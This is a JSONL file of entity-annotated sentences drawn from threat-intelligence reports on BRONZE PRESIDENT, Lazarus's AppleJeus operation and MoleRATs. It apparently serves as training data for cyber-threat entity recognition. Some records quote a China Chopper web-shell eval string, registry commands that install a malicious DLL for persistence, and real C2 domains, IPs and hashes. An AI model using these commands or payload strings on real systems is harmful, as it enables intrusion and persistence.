proliferation of the tool , suggesting it may be exclusively used by BRONZE PRESIDENT .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 62, "end": 71, "label": "Malware"}, {"start": 152, "end": 168, "label": "Organization"}]} {"text": "Nbtscan \u2014 This publicly available command-line tool scans systems for NetBIOS name information ( see Figure 2 ) .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 70, "end": 77, "label": "Indicator"}]} {"text": "In an example observed by CTU researchers , the Nbtscan executable was named Adobe.exe and was installed in several working directories on compromised hosts , including : C:\\Recovery\\ .", "spans": [{"start": 26, "end": 29, "label": "Organization"}, {"start": 48, "end": 55, "label": "System"}, {"start": 77, "end": 86, "label": "Indicator"}]} {"text": "Nmap \u2014 BRONZE PRESIDENT used this freely available network scanning tool from the C:\\PerfLogs\\ folder .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 7, "end": 23, "label": "Organization"}]} {"text": "Wmiexec \u2014 This publicly available tool uses WMI to create SYSTEM-level shells on remote hosts .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 44, "end": 47, "label": "System"}]} {"text": "While analyzing hosts compromised by BRONZE PRESIDENT , CTU researchers identified other malware artifacts .", "spans": [{"start": 37, "end": 53, "label": "Organization"}, {"start": 56, "end": 59, "label": "Organization"}]} {"text": "Although there was no evidence of the group using the malware , the threat actors may have leveraged its access or capabilities during earlier phases of the intrusions .", "spans": []} {"text": "The BRONZE PRESIDENT intrusions observed by CTU researchers appear to have taken place over several months or years .", "spans": [{"start": 4, "end": 20, "label": "Organization"}, {"start": 44, "end": 47, "label": "Organization"}]} {"text": "China Chopper web shell files named 
error404.aspx included the \"eval (Request.Item[\"|\"] ,\"unsafe\" ) ; \" string .", "spans": [{"start": 6, "end": 13, "label": "System"}, {"start": 36, "end": 49, "label": "Indicator"}]} {"text": "To successfully interact with the web shell , a threat actor sent HTTP requests that included the \"|\" parameter .", "spans": [{"start": 66, "end": 70, "label": "Indicator"}]} {"text": "The web shell files appeared to be installed during the timeframe that BRONZE PRESIDENT was active on the system .", "spans": [{"start": 71, "end": 87, "label": "Organization"}]} {"text": "CTU researchers identified a variety of post-compromise tools stored under %AppData% ( e.g. , \\AppData\\Roaming\\Temp ) on several compromised systems .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "The widespread proliferation and use of the following tools suggest that the group likely has the knowledge and capability to use them as part of its operations :", "spans": []} {"text": "Powerview.ps1 \u2014 This PowerShell-based module for network reconnaissance is part of the PowerSploit penetration testing framework .", "spans": [{"start": 0, "end": 13, "label": "Indicator"}, {"start": 21, "end": 37, "label": "System"}, {"start": 87, "end": 98, "label": "System"}]} {"text": "PVE Find AD User \u2014 This command-line tool identifies login locations of Active Directory ( AD ) users .", "spans": [{"start": 0, "end": 16, "label": "System"}, {"start": 72, "end": 88, "label": "System"}, {"start": 91, "end": 93, "label": "System"}]} {"text": "AdFind \u2014 This command-line tool conducts AD queries .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 41, "end": 43, "label": "System"}]} {"text": "NetSess \u2014 This publicly available tool enumerates NetBIOS sessions .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 50, "end": 57, "label": "System"}]} {"text": "Netview \u2014 This tool enumerates networks .", "spans": [{"start": 0, "end": 7, "label": 
"System"}]} {"text": "TeamViewer \u2014 This remote control and desktop-sharing tool has applications for legitimate and malicious system users .", "spans": [{"start": 0, "end": 10, "label": "System"}]} {"text": "Its installation in a temporary directory alongside network reconnaissance and enumeration tools likely indicates malicious intent .", "spans": []} {"text": "At the time of detection , observed BRONZE PRESIDENT incidents had likely been ongoing for several months or even years .", "spans": [{"start": 36, "end": 52, "label": "Organization"}]} {"text": "As a result , CTU researchers were unable to ascertain the initial access vector .", "spans": [{"start": 14, "end": 17, "label": "Organization"}]} {"text": "In October 2019 , third-party researchers described a phishing campaign that used C2 infrastructure that CTU researchers attribute to BRONZE PRESIDENT .", "spans": [{"start": 82, "end": 84, "label": "System"}, {"start": 105, "end": 108, "label": "Organization"}, {"start": 134, "end": 150, "label": "Organization"}]} {"text": "This connection suggests that the group uses phishing emails with ZIP attachments that contain LNK files as an initial access vector .", "spans": [{"start": 54, "end": 60, "label": "System"}, {"start": 66, "end": 69, "label": "System"}, {"start": 95, "end": 98, "label": "System"}]} {"text": "During one intrusion , the threat actors gained administrator access to all systems within a targeted business unit and installed their remote access tools on 80% of the hosts .", "spans": []} {"text": "The group installed multiple tools within the environment , including three different tools on a strategically important server , likely to provide contingency access options .", "spans": []} {"text": "During multiple intrusions , the threat actors employed various tools and techniques to understand the network environments .", "spans": []} {"text": "For example , they used Nmap to scan various internal IP address ranges and SMB ports .", "spans": 
[{"start": 24, "end": 28, "label": "System"}, {"start": 76, "end": 79, "label": "Indicator"}]} {"text": "They also relied on Nbtscan , net user , and ping commands to obtain insights and identify opportunities for lateral movement .", "spans": []} {"text": "BRONZE PRESIDENT regularly leverages Wmiexec to move laterally .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 37, "end": 44, "label": "System"}]} {"text": "During one intrusion , the threat actors extensively used this tool to execute WMI commands on remote hosts in the environment .", "spans": [{"start": 79, "end": 82, "label": "System"}]} {"text": "The threat actors retrieved the NTDS.dit file from the volume shadow copy .", "spans": [{"start": 32, "end": 40, "label": "Indicator"}]} {"text": "NTDS.dit contains Active Directory data , including password hashes for all users on a domain .", "spans": [{"start": 0, "end": 8, "label": "Indicator"}, {"start": 18, "end": 34, "label": "System"}]} {"text": "Extracting hashes from the NTDS.dit file requires access to the SYSTEM file in the system registry .", "spans": [{"start": 27, "end": 35, "label": "Indicator"}]} {"text": "The threat actors saved both the SYSTEM file ( system.hive ) and NTDS.dit in the compromised host's c:\\windows\\temp directory .", "spans": [{"start": 47, "end": 58, "label": "Indicator"}, {"start": 65, "end": 73, "label": "Indicator"}]} {"text": "These files were likely exfiltrated and exploited offline to retrieve user password hashes , which could then be cracked or used to perform pass-the-hash attacks .", "spans": []} {"text": "BRONZE PRESIDENT 's C2 techniques are dictated by its remote access tools .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 20, "end": 22, "label": "System"}]} {"text": "The group's primary and likely proprietary RCSession RAT communicates with a hard-coded C2 server using a custom protocol over TCP port 443 .", "spans": [{"start": 43, "end": 52, "label": "Malware"}, 
{"start": 88, "end": 90, "label": "System"}, {"start": 127, "end": 130, "label": "Indicator"}]} {"text": "After connecting to its C2 server , RCSession checks in with an encrypted beacon and then awaits instruction .", "spans": [{"start": 24, "end": 26, "label": "System"}, {"start": 36, "end": 45, "label": "Malware"}]} {"text": "The ORat tool , which appears to be used less frequently by the group , communicates over TCP port 80 using a raw socket protocol ( not HTTP ) .", "spans": [{"start": 4, "end": 8, "label": "Malware"}, {"start": 90, "end": 93, "label": "Indicator"}, {"start": 136, "end": 140, "label": "Indicator"}]} {"text": "The Cobalt Strike tool has malleable C2 profiles .", "spans": [{"start": 4, "end": 17, "label": "System"}, {"start": 37, "end": 39, "label": "System"}]} {"text": "During one intrusion , it connected to multiple C2 domains on TCP port 80 , including mail . svrchost . com , using the following request .", "spans": [{"start": 48, "end": 50, "label": "System"}, {"start": 62, "end": 65, "label": "Indicator"}]} {"text": "Subsequent Cobalt Strike C2 servers included subdomains of svchosts . com , svrchost . com , and strust . 
club .", "spans": [{"start": 11, "end": 24, "label": "System"}, {"start": 25, "end": 27, "label": "System"}]} {"text": "Some BRONZE PRESIDENT C2 domains analyzed by CTU researchers were hosted on infrastructure owned by Dutch VPS provider Host Sailor , Hong Kong-based New World Telecoms , and Malaysia-based Shinjiru Technology ( see Figure 7 ) .", "spans": [{"start": 5, "end": 21, "label": "Organization"}, {"start": 22, "end": 24, "label": "System"}, {"start": 45, "end": 48, "label": "Organization"}, {"start": 106, "end": 109, "label": "System"}]} {"text": "The threat actors have used discrete infrastructure clusters that share matching hosting and registration characteristics .", "spans": []} {"text": "The pattern of infrastructure hosting suggests that the group parks its domains when not in use , an operational security technique that limits exposure of the group's overall hosting infrastructure .", "spans": []} {"text": "Some of BRONZE PRESIDENT 's malware has persistence capabilities .", "spans": [{"start": 8, "end": 24, "label": "Organization"}]} {"text": "For example , ORat uses a WMI event consumer to maintain its presence on a compromised host .", "spans": [{"start": 14, "end": 18, "label": "Malware"}, {"start": 26, "end": 29, "label": "System"}]} {"text": "The group also creates and maintains scheduled tasks to achieve this purpose .", "spans": []} {"text": "Figure 8 shows a Sysdriver scheduled task that periodically executes a Cobalt Strike payload .", "spans": [{"start": 71, "end": 84, "label": "System"}]} {"text": "The threat actors tend to install malware on a large proportion of hosts during their intrusions .", "spans": []} {"text": "However , the group exercises restraint and defensive evasion tactics to minimize opportunities for network defenders to detect or investigate its activities .", "spans": []} {"text": "For example , the threat actors deleted volume shadow copies after using them for NTDS.dit retrieval .", "spans": [{"start": 82, "end": 
90, "label": "Indicator"}]} {"text": "BRONZE PRESIDENT targets specific data types .", "spans": [{"start": 0, "end": 16, "label": "Organization"}]} {"text": "The threat actors use custom batch scripts to create a list of files with predefined criteria and collate the identified files into a .rar archive ( see Figure 9 ) .", "spans": [{"start": 134, "end": 138, "label": "Indicator"}]} {"text": "CTU researchers have observed BRONZE PRESIDENT batch scripts named doc.bat , xls.bat , xlsx.bat , ppt.bat , pptx.bat , pdf.bat , and txt.bat .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 30, "end": 46, "label": "Organization"}, {"start": 67, "end": 74, "label": "Indicator"}, {"start": 77, "end": 84, "label": "Indicator"}, {"start": 87, "end": 95, "label": "Indicator"}, {"start": 98, "end": 105, "label": "Indicator"}, {"start": 108, "end": 116, "label": "Indicator"}, {"start": 119, "end": 126, "label": "Indicator"}, {"start": 133, "end": 140, "label": "Indicator"}]} {"text": "The group also uses the all.bat batch script to collect all files stored on a specific user's desktop .", "spans": [{"start": 24, "end": 31, "label": "Indicator"}]} {"text": "CTU researchers observed RCSession and Cobalt Strike on systems that BRONZE PRESIDENT targeted for data theft .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 25, "end": 34, "label": "Malware"}, {"start": 39, "end": 52, "label": "System"}, {"start": 69, "end": 85, "label": "Organization"}]} {"text": "Either of these tools could have been used to exfiltrate the archived data .", "spans": []} {"text": "BRONZE PRESIDENT has demonstrated intent to steal data from organizations using tools such as Cobalt Strike , PlugX , ORat , and RCSession .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 94, "end": 107, "label": "System"}, {"start": 110, "end": 115, "label": "Malware"}, {"start": 118, "end": 122, "label": "Malware"}, {"start": 129, "end": 138, "label": 
"Malware"}]} {"text": "The concurrent use of so many tools during a single intrusion suggests that the group could include threat actors with distinct tactics , roles , and tool preferences .", "spans": []} {"text": "It is likely that BRONZE PRESIDENT has additional unobserved operational tools and capabilities .", "spans": [{"start": 18, "end": 34, "label": "Organization"}]} {"text": "CTU researchers recommend that organizations apply controls to mitigate common intrusion techniques and behaviors along with controls that address the tools and techniques discussed in this analysis .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "PlugX C2 server : ipsoftwarelabs.com .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 6, "end": 8, "label": "System"}, {"start": 18, "end": 36, "label": "Indicator"}]} {"text": "RCSession C2 server : toshibadrive.com .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 10, "end": 12, "label": "System"}, {"start": 22, "end": 38, "label": "Indicator"}]} {"text": "ORat and Cobalt Strike C2 server : strust.club .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 9, "end": 22, "label": "System"}, {"start": 23, "end": 25, "label": "System"}, {"start": 35, "end": 46, "label": "Indicator"}]} {"text": "Cobalt Strike C2 server : svchosts.com , svrhosts.com .", "spans": [{"start": 0, "end": 13, "label": "System"}, {"start": 14, "end": 16, "label": "System"}, {"start": 26, "end": 38, "label": "Indicator"}, {"start": 41, "end": 53, "label": "Indicator"}]} {"text": "Cobalt Strike download location : 116.93.154.250 .", "spans": [{"start": 0, "end": 13, "label": "System"}, {"start": 34, "end": 48, "label": "Indicator"}]} {"text": "ORat malware sample : a0758535cf8eb689782b95d3791d23d5 , 774a9c3ff01a3e734b7bec0c312120126295fad9 , 2e8762c984468ee309dad30a6c5f6d3308676ac721357da442a8a5b9d9d65d82 .", "spans": [{"start": 0, "end": 4, "label": "Malware"}, {"start": 22, "end": 54, "label": 
"Indicator"}, {"start": 57, "end": 97, "label": "Indicator"}, {"start": 100, "end": 164, "label": "Indicator"}]} {"text": "Cobalt Strike payload : 7101fff478290d4db8a1c11a8d3b40cb , 4c81777551a772218519fb6dd1a6672aade4a936 , bdf1452b55b9974f3e9a4aea4439769a02fd931660ed655df92519a2a4df1261 .", "spans": [{"start": 0, "end": 13, "label": "System"}, {"start": 24, "end": 56, "label": "Indicator"}, {"start": 59, "end": 99, "label": "Indicator"}, {"start": 102, "end": 166, "label": "Indicator"}]} {"text": "Modified DLL file ( goopdate.dll ) used by BRONZE PRESIDENT to install RCSession : 0617cad9e5d559356c43d4037c86227f , f14eaf5d648aebb2ed7b00b2cf4349263b30fb1c , 2ea9ccf653f63bcc3549a313ec9d0bada341556cc32dd2ca4b73e0c034492740 .", "spans": [{"start": 9, "end": 12, "label": "System"}, {"start": 20, "end": 32, "label": "Indicator"}, {"start": 43, "end": 59, "label": "Organization"}, {"start": 71, "end": 80, "label": "Malware"}, {"start": 83, "end": 115, "label": "Indicator"}, {"start": 118, "end": 158, "label": "Indicator"}, {"start": 161, "end": 225, "label": "Indicator"}]} {"text": "Operation AppleJeus Sequel , Lazarus continues to attack the cryptocurrency business with enhanced capabilities .", "spans": [{"start": 29, "end": 36, "label": "Organization"}]} {"text": "The Lazarus group is currently one of the most active and prolific APT actors .", "spans": [{"start": 4, "end": 11, "label": "Organization"}]} {"text": "In 2018 , Kaspersky published a report on one of their campaigns , named Operation AppleJeus .", "spans": []} {"text": "Notably , this operation marked the first time Lazarus had targeted macOS users , with the group inventing a fake company in order to deliver their manipulated application and exploit the high level of trust among potential victims .", "spans": [{"start": 47, "end": 54, "label": "Organization"}, {"start": 68, "end": 73, "label": "System"}]} {"text": "As a result of our ongoing efforts , we identified significant changes to the group \u2019s 
attack methodology .", "spans": []} {"text": "To attack macOS users , the Lazarus group has developed homemade macOS malware , and added an authentication mechanism to deliver the next stage payload very carefully , as well as loading the next-stage payload without touching the disk .", "spans": [{"start": 10, "end": 15, "label": "System"}, {"start": 28, "end": 35, "label": "Organization"}, {"start": 65, "end": 70, "label": "System"}]} {"text": "In addition , to attack Windows users , they have elaborated a multi-stage infection procedure , and significantly changed the final payload .", "spans": [{"start": 24, "end": 31, "label": "System"}]} {"text": "We assess that the Lazarus group has been more careful in its attacks following the release of Operation AppleJeus and they have employed a number of methods to avoid being detected .", "spans": [{"start": 19, "end": 26, "label": "Organization"}]} {"text": "After releasing Operation AppleJeus , the Lazarus group continued to use a similar modus operandi in order to compromise cryptocurrency businesses .", "spans": [{"start": 42, "end": 49, "label": "Organization"}]} {"text": "We found more macOS malware similar to that used in the original Operation AppleJeus case .", "spans": [{"start": 14, "end": 19, "label": "System"}]} {"text": "This macOS malware used public source code in order to build crafted macOS installers .", "spans": [{"start": 5, "end": 10, "label": "System"}, {"start": 69, "end": 74, "label": "System"}]} {"text": "The malware authors used QtBitcoinTrader developed by Centrabit .", "spans": [{"start": 25, "end": 40, "label": "System"}, {"start": 54, "end": 63, "label": "Organization"}]} {"text": "These three macOS installers use a similar post installer script in order to implant a mach-o payload , as well as using the same command-line argument when executing the fetched second-stage payload .", "spans": [{"start": 12, "end": 17, "label": "System"}, {"start": 87, "end": 93, "label": "System"}]} 
{"text": "However , they have started changing their macOS malware .", "spans": [{"start": 43, "end": 48, "label": "System"}]} {"text": "We recognized a different type of macOS malware , MarkMakingBot.dmg ( be37637d8f6c1fbe7f3ffc702afdfe1d ) , created on 2019-03-12 .", "spans": [{"start": 34, "end": 39, "label": "System"}, {"start": 50, "end": 67, "label": "Indicator"}, {"start": 70, "end": 102, "label": "Indicator"}]} {"text": "It doesn\u2019t have an encryption/decryption routine for network communication .", "spans": []} {"text": "We speculate that this is an intermediate stage in significant changes to their macOS malware .", "spans": [{"start": 80, "end": 85, "label": "System"}]} {"text": "During our ongoing tracking of this campaign , we found that one victim was compromised by Windows AppleJeus malware in March 2019 .", "spans": [{"start": 91, "end": 98, "label": "System"}]} {"text": "Unfortunately , we couldn\u2019t identify the initial installer , but we established that the infection started from a malicious file named WFCUpdater.exe .", "spans": [{"start": 135, "end": 149, "label": "Indicator"}]} {"text": "At that time , the actor used a fake website : wfcwallet.com .", "spans": [{"start": 47, "end": 60, "label": "Indicator"}]} {"text": "The actor used a multi-stage infection like before , but the method was different .", "spans": []} {"text": "The infection started from .NET malware , disguised as a WFC wallet updater ( a9e960948fdac81579d3b752e49aceda ) .", "spans": [{"start": 57, "end": 60, "label": "Organization"}, {"start": 78, "end": 110, "label": "Indicator"}]} {"text": "Upon execution , this .NET executable checks whether the command line argument is \u201c /Embedding \u201d or not .", "spans": [{"start": 22, "end": 26, "label": "Indicator"}]} {"text": "This malware is responsible for decrypting the WFC.cfg file in the same folder with a hardcoded 20-byte XOR key .", "spans": [{"start": 47, "end": 54, "label": "Indicator"}]} {"text": "This mimics 
the wallet updater connected to the C2 addresses : wfcwallet.com ( resolved ip : 108.174.195.134 ) , www.chainfun365.com ( resolved ip : 23.254.217.53 ) .", "spans": [{"start": 48, "end": 50, "label": "System"}, {"start": 63, "end": 76, "label": "Indicator"}, {"start": 93, "end": 108, "label": "Indicator"}, {"start": 113, "end": 132, "label": "Indicator"}, {"start": 149, "end": 162, "label": "Indicator"}]} {"text": "After that , it carries out the malware operator \u2019s commands in order to install the next stage permanent payload .", "spans": []} {"text": "The actor delivered two more files into the victim \u2019s system folder : rasext.dll and msctfp.dat .", "spans": [{"start": 70, "end": 80, "label": "Indicator"}, {"start": 85, "end": 95, "label": "Indicator"}]} {"text": "They used the RasMan ( Remote Access Connection Manager ) Windows service to register the next payload with a persistence mechanism .", "spans": [{"start": 14, "end": 20, "label": "System"}, {"start": 23, "end": 55, "label": "System"}, {"start": 58, "end": 65, "label": "System"}]} {"text": "After fundamental reconnaissance , the malware operator implanted the delivered payload by manually using the following commands :", "spans": []} {"text": "cmd.exe /c dir rasext.dll , cmd.exe /c dir msctfp.dat , cmd.exe /c tasklist /svc | findstr RasMan , cmd.exe /c reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\RasMan\\ThirdParty /v DllName /d rasext.dll /f .", "spans": [{"start": 0, "end": 7, "label": "Indicator"}, {"start": 15, "end": 25, "label": "Indicator"}, {"start": 28, "end": 35, "label": "Indicator"}, {"start": 43, "end": 53, "label": "Indicator"}, {"start": 56, "end": 63, "label": "Indicator"}, {"start": 91, "end": 97, "label": "System"}, {"start": 100, "end": 107, "label": "Indicator"}, {"start": 204, "end": 214, "label": "Indicator"}]} {"text": "In order to establish remote tunneling , the actor delivered more tools , executing with command-line parameters .", "spans": []} 
{"text": "Unfortunately , we have had no chance to obtain this file , but we speculate that Device.exe is responsible for opening port 6378 , and the CenterUpdater.exe tool was used for creating tunneling to a remote host .", "spans": [{"start": 82, "end": 92, "label": "Indicator"}, {"start": 140, "end": 157, "label": "Indicator"}]} {"text": "Note that the 104.168.167.16 server is used as a C2 server .", "spans": [{"start": 14, "end": 28, "label": "Indicator"}, {"start": 49, "end": 51, "label": "System"}]} {"text": "The fake website hosting server for the UnionCryptoTrader case will be described next .", "spans": [{"start": 40, "end": 57, "label": "System"}]} {"text": "We also found a Windows version of the UnionCryptoTrader ( 0f03ec3487578cef2398b5b732631fec ) .", "spans": [{"start": 16, "end": 23, "label": "System"}, {"start": 39, "end": 56, "label": "System"}, {"start": 59, "end": 91, "label": "Indicator"}]} {"text": "It was executed from the Telegram messenger download folder :", "spans": [{"start": 25, "end": 33, "label": "System"}]} {"text": "C:\\Users\\[user name]\\Downloads\\Telegram Desktop\\UnionCryptoTraderSetup.exe .", "spans": [{"start": 40, "end": 74, "label": "Indicator"}]} {"text": "We also found the actor \u2019s Telegram group on their fake website .", "spans": [{"start": 27, "end": 35, "label": "System"}]} {"text": "Based on these , we assess with high confidence that the actor delivered the manipulated installer using the Telegram messenger .", "spans": [{"start": 109, "end": 117, "label": "System"}]} {"text": "Unfortunately , we can\u2019t get all the related files as some payloads were only executed in memory .", "spans": []} {"text": "However , we can reassemble the whole infection procedure based on our telemetry .", "spans": []} {"text": "The overall infection procedure was very similar to the WFCWallet case , but with an added injection procedure , and they only used the final backdoor payload instead of using a tunneling tool .", "spans": 
[{"start": 56, "end": 65, "label": "System"}]} {"text": "The UnionCryptoTrader Windows version has the following window showing a price chart for several cryptocurrency exchanges .", "spans": [{"start": 4, "end": 21, "label": "System"}, {"start": 22, "end": 29, "label": "System"}, {"start": 56, "end": 62, "label": "System"}]} {"text": "The Windows version of UnionCryptoTrader updater ( 629b9de3e4b84b4a0aa605a3e9471b31 ) has similar functionality to the macOS version .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 23, "end": 40, "label": "System"}, {"start": 51, "end": 83, "label": "Indicator"}, {"start": 119, "end": 124, "label": "System"}]} {"text": "According to the build path ( Z:\\Loader\\x64\\Release\\WinloaderExe.pdb ) , the malware author called this malware a loader .", "spans": []} {"text": "Upon launch , the malware retrieves the victim \u2019s basic system information , sending it in the following HTTP POST format , as is the case with the macOS malware .", "spans": [{"start": 105, "end": 109, "label": "Indicator"}, {"start": 148, "end": 153, "label": "System"}]} {"text": "If the response code from the C2 server is 200 , the malware decrypts the payload and loads it in memory .", "spans": [{"start": 30, "end": 32, "label": "System"}]} {"text": "Finally , the malware sends the act=done value and return code .", "spans": []} {"text": "The next stage payload ( e1953fa319cc11c2f003ad0542bca822 ) , downloaded from this loader , is similar to the .NET downloader in the WFCWallet case .", "spans": [{"start": 25, "end": 57, "label": "Indicator"}, {"start": 110, "end": 114, "label": "System"}, {"start": 133, "end": 142, "label": "System"}]} {"text": "This malware is responsible for decrypting the Adobe.icx file in the same folder .", "spans": [{"start": 47, "end": 56, "label": "Indicator"}]} {"text": "It injects the next payload into the Internet Explorer process , and the tainted iexplore.exe process carries out the attacker \u2019s commands 
.", "spans": [{"start": 81, "end": 93, "label": "Indicator"}]} {"text": "The final payload ( dd03c6eb62c9bf9adaf831f1d7adcbab ) is implanted manually as in the WFCWallet case .", "spans": [{"start": 20, "end": 52, "label": "Indicator"}, {"start": 87, "end": 96, "label": "System"}]} {"text": "This final payload was designed to run only on certain systems .", "spans": []} {"text": "It seems that the malware authors produced and delivered malware that only works on specific systems based on previously collected information .", "spans": []} {"text": "The malware checks the infected system \u2019s information and compares it to a given value .", "spans": []} {"text": "It seems the actor wants to execute the final payload very carefully , and wants to evade detection by behavior-based detection solutions .", "spans": []} {"text": "This Windows malware loads the encrypted msctfp.dat file in a system folder , and loads each configuration value .", "spans": [{"start": 5, "end": 12, "label": "System"}, {"start": 41, "end": 51, "label": "Indicator"}]} {"text": "Then it executes an additional command based on the contents of this file .", "spans": []} {"text": "When the malware communicates with the C2 server , it uses a POST request with several predefined headers .", "spans": [{"start": 39, "end": 41, "label": "System"}]} {"text": "Finally , the malware downloads the next stage payload , decrypting it and possibly executing it with the Print parameter .", "spans": []} {"text": "We speculate that the DLL type payload will be downloaded and call its Print export function for further infection .", "spans": [{"start": 22, "end": 25, "label": "System"}]} {"text": "We can\u2019t get hold of the final payload that \u2019s executed in memory , but we believe its backdoor-type malware is ultimately used to control the infected victim .", "spans": []} {"text": "We were able to identify several victims in this Operation AppleJeus sequel .", "spans": []} {"text": "Victims were recorded 
in the UK , Poland , Russia and China .", "spans": []} {"text": "Moreover , we were able to confirm that several of the victims are linked to cryptocurrency business entities .", "spans": []} {"text": "The actor altered their macOS and Windows malware considerably , adding an authentication mechanism in the macOS downloader and changing the macOS development framework .", "spans": [{"start": 24, "end": 29, "label": "System"}, {"start": 34, "end": 41, "label": "System"}, {"start": 107, "end": 112, "label": "System"}, {"start": 141, "end": 146, "label": "System"}]} {"text": "The binary infection procedure in the Windows system differed from the previous case .", "spans": [{"start": 38, "end": 45, "label": "System"}]} {"text": "They also changed the final Windows payload significantly from the well-known Fallchill malware used in the previous attack .", "spans": [{"start": 28, "end": 35, "label": "System"}, {"start": 78, "end": 87, "label": "Malware"}]} {"text": "We believe the Lazarus group \u2019s continuous attacks for financial gain are unlikely to stop anytime soon .", "spans": [{"start": 15, "end": 22, "label": "Organization"}]} {"text": "Since the initial appearance of Operation AppleJeus , we can see that over time the authors have changed their modus operandi considerably .", "spans": []} {"text": "NEW CYBER ESPIONAGE CAMPAIGNS TARGETING PALESTINIANS Over the last several months , the Cybereason Nocturnus team has been tracking recent espionage campaigns targeting the Middle East .", "spans": [{"start": 88, "end": 108, "label": "Organization"}]} {"text": "These campaigns are specifically directed at entities and individuals in the Palestinian territories .", "spans": []} {"text": "This investigation shows multiple similarities to previous attacks attributed to a group called MoleRATs ( aka The Gaza Cybergang ) , an Arabic-speaking , politically motivated group that has operated in the Middle East since 2012 .", "spans": [{"start": 96, "end": 104, "label": 
"Organization"}, {"start": 115, "end": 129, "label": "Organization"}]} {"text": "In our analysis , we distinguish between two separate campaigns happening simultaneously .", "spans": []} {"text": "These campaigns differ in tools , server infrastructure , and nuances in decoy content and intended targets .", "spans": []} {"text": "The Spark Campaign : This campaign uses social engineering to infect victims , mainly from the Palestinian territories , with the Spark backdoor .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 130, "end": 144, "label": "Malware"}]} {"text": "This backdoor first emerged in January 2019 and has been continuously active since then .", "spans": []} {"text": "The campaign \u2019s lure content revolves around recent geopolitical events , especially the Israeli-Palestinian conflict , the assassination of Qasem Soleimani , and the ongoing conflict between Hamas and Fatah Palestinian movements .", "spans": []} {"text": "The Pierogi Campaign : This campaign uses social engineering attacks to infect victims with a new , undocumented backdoor dubbed Pierogi .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 129, "end": 136, "label": "Malware"}]} {"text": "This backdoor first emerged in December 2019 , and was discovered by Cybereason .", "spans": [{"start": 69, "end": 79, "label": "Organization"}]} {"text": "In this campaign , the attackers use different TTPs and decoy documents reminiscent of previous campaigns by MoleRATs involving the Micropsia and Kaperagent malware .", "spans": [{"start": 109, "end": 117, "label": "Organization"}, {"start": 132, "end": 141, "label": "Malware"}, {"start": 146, "end": 156, "label": "Malware"}]} {"text": "In part one of this research , we analyze the Spark campaign .", "spans": [{"start": 46, "end": 51, "label": "Malware"}]} {"text": "This campaign is named after a rare backdoor used by the MoleRATs Group , dubbed Spark by Cybereason and previously reported by 360 \u2019s blog 
.", "spans": [{"start": 57, "end": 65, "label": "Organization"}, {"start": 81, "end": 86, "label": "Malware"}, {"start": 90, "end": 100, "label": "Organization"}, {"start": 128, "end": 131, "label": "Organization"}]} {"text": "The creators of the Spark backdoor use several techniques to evade detection and stay under the radar .", "spans": [{"start": 20, "end": 34, "label": "Malware"}]} {"text": "They pack the malware with a powerful commercial tool called Enigma Packer and implement language checks to ensure the victims are Arabic speaking .", "spans": [{"start": 61, "end": 74, "label": "System"}]} {"text": "This minimizes the risk of detection and infection of unwanted victims .", "spans": []} {"text": "Cyber Espionage in the Middle East : The Cybereason Nocturnus team has discovered several recent , targeted attacks in the Middle East .", "spans": [{"start": 41, "end": 61, "label": "Organization"}, {"start": 123, "end": 134, "label": "System"}]} {"text": "These attacks deliver the Spark and Pierogi backdoors for politically-driven cyber espionage operations .", "spans": [{"start": 26, "end": 31, "label": "Malware"}, {"start": 36, "end": 53, "label": "Malware"}]} {"text": "Targeting Palestinians : The campaigns seem to target Palestinian individuals and entities , likely related to the Palestinian government .", "spans": []} {"text": "Politically-motivated APT : Cybereason suspects that the objective of the threat actor is to obtain sensitive information from the victims and leverage it for political purposes .", "spans": [{"start": 28, "end": 38, "label": "Organization"}]} {"text": "Lured Into Deploying a Backdoor : The attackers use specially crafted lure content to trick targets into opening malicious files that infect the victim \u2019s machine with a backdoor .", "spans": []} {"text": "The lure content in the malicious files relates to political affairs in the Middle East , with specific references to the Israeli-Palestinian conflict , tension between Hamas 
and Fatah , and other political entities in the region .", "spans": [{"start": 169, "end": 174, "label": "Organization"}, {"start": 179, "end": 184, "label": "Organization"}]} {"text": "Perpetrated by an Arabic-Speaking APT Group : The modus-operandi of the attackers in conjunction with the social engineering tactics and decoy content seem aligned with previous attacks carried out by the Arabic-speaking APT group MoleRATs ( aka Gaza Cybergang ) .", "spans": [{"start": 231, "end": 239, "label": "Organization"}, {"start": 246, "end": 260, "label": "Organization"}]} {"text": "This group has been operating in the Middle East since 2012 .", "spans": []} {"text": "These attacks show significant similarities to previously documented attacks attributed to the Arabic-speaking threat actor , commonly referred to as the MoleRATs group ( aka , The Gaza Cybergang , Moonlight , DustySky , Gaza Hacker Team ) .", "spans": [{"start": 154, "end": 162, "label": "Organization"}, {"start": 181, "end": 195, "label": "Organization"}, {"start": 198, "end": 207, "label": "Organization"}, {"start": 210, "end": 218, "label": "Organization"}, {"start": 221, "end": 237, "label": "Organization"}]} {"text": "This group , which has been attributed by various security teams , is believed to be comprised of three subgroups :", "spans": []} {"text": "Gaza Cybergang Group 1 , also dubbed MoleRATs : MoleRATs has been active since at least 2012 .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 37, "end": 45, "label": "Organization"}, {"start": 48, "end": 56, "label": "Organization"}]} {"text": "This Arabic-speaking group uses spear phishing attacks to infect target machines in the Middle East and North Africa with various Remote Access Trojans ( RATs ) .", "spans": [{"start": 130, "end": 151, "label": "System"}, {"start": 154, "end": 158, "label": "System"}]} {"text": "As 